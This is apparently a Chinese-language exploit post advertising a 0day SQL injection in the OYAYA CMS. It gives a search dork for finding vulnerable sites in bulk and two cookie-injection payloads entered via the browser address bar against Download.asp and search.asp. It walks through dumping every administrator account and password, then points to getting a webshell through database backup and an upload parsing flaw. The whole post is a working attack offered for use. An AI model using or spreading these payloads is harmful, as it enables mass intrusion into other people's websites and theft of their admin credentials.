凹丫丫系统ACC版和SQL版最新注入0day

批量关键字：Powered By OYAYA.CN inurl:download.asp

利用代码： javascript:alert(document.cookie=”BigClassName=”+escape(“%25′ and 1=2 union select 1,admin,3,password,5,6,7,8,9,10,11,12,13 from admin where 1=1 and ‘a’='a”));

打开http://www.xx.com/Download.asp页面，然后在第一个页的IE地址栏中以上利用代码，然后访

问http://www.xx.com/Download.asp?页，刷新一次，系统中所有的管理员账号和密码就列出来了。
===========================================

利 用代码： javascript:alert(document.cookie=”key=”+escape(“%25%25′ and 1=2 union select admin,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin where 1=1 and aleave like ‘%25%25″));

在确定search.asp页面存在的情况下访问http://www.xx.com/search.asp?otype=title&key=xx，

然后在IE地址栏输入以上利用代码后再访问http://www.xx.com/search.asp?otype=title& 页面，

刷新，同样的系统全部管理账号密码都暴出来了。

后台拿webshell很简单，数据库备份，以及添加新闻时候上传图片程序处的解析漏洞利用.